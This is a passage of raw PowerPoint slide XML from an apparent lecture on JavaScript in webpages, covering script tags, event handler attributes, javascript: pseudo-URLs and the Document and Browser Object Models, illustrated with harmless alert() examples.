              <a:t>Navigation systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Hundreds of applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Google Docs, Google Maps, dashboard widgets in Mac OS X, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581909850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2" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF992CA9-2F17-8A45-84C9-E254ACC97FE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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>JavaScript in Webpages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ADAC91-8505-5C43-9A74-9D126B39E62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963690" y="1000370"/>
            <a:ext cx="6754322" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Embedded in HTML as a &lt;script&gt; element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Written directly inside a &lt;script&gt; element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script&gt; alert("Hello World!") &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>In a file linked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> attribute of a &lt;script&gt; element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script type="text/JavaScript” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>functions.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Event handler attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>www.yahoo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>="alert('hi');"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Pseudo-URL referenced by a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“JavaScript: alert(‘You clicked’);”&gt;Click me&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3833449203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F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37889" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1245CC16-7F11-974D-89EC-9F96A55A575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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37890" name="Rectangle 9" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE9E0C6-88F2-0045-822C-F8261CD2BD2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963691" y="1000370"/>
            <a:ext cx="6212310" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTML page is structured data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>DOM is object-oriented representation of the hierarchical HTML structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Properties:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.alinkColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>[ ], …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Methods:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>also Browser Object Model (BOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Window, Document, Frames[], History, Location, Navigator (type and version of browser)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C22D658-D982-AE41-B4B4-08DBA51A1946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6463332" y="3867378"/>
            <a:ext cx="48622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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>These change the content of the page!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A596109-7BAA-4D4B-96CC-666042B08447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5820017" y="3796381"/>
            <a:ext cx="1485720" cy="322200"/>
            <a:chOff x="5820017" y="3747394"/>
            <a:chExt cx="1485720" cy="322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21973646-C056-8D4C-BCFC-0F211B5589EA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5820017" y="3755674"/>
                <a:ext cx="1485720" cy="31392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21973646-C056-8D4C-BCFC-0F211B5589EA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802377" y="3737674"/>
                  <a:ext cx="1521360" cy="34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03FB884A-35E0-2849-BE7D-6CE0BC07BCE6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5919737" y="3747394"/>
                <a:ext cx="277200" cy="1188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03FB884A-35E0-2849-BE7D-6CE0BC07BCE6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901737" y="3729754"/>
                  <a:ext cx="312840" cy="475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614222360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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF850542-2C1C-A649-B11E-797568AA316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Browser and Document Structure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38914" name="Picture 2" descr="http://msconline.maconstate.edu/Tutorials/JSDHTML/JSDHTML01/Fig13.gif">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17E549A-F36E-8E43-8CFB-A38675513A3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19200" y="1861345"/>
            <a:ext cx="5175250" cy="4243387"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3BEFF4-EE7A-A647-80CB-A09F03AFD8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83828" y="5458619"/>
            <a:ext cx="3810000" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W3C standard differs from models supported in existing browsers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CC7FF2F0-0A5C-9244-A0C1-5074A87506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8828" y="1573322"/>
            <a:ext cx="2760939" cy="2854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BD51F76-2CE7-AE48-B7EE-66F6ECDDDED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10198490" y="1466150"/>
            <a:ext cx="1151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DOM tree</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347404938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0" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B583B108-4FD3-404C-B494-6A3003090D5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98332" y="2021316"/>
            <a:ext cx="2231571" cy="575761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Sample script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
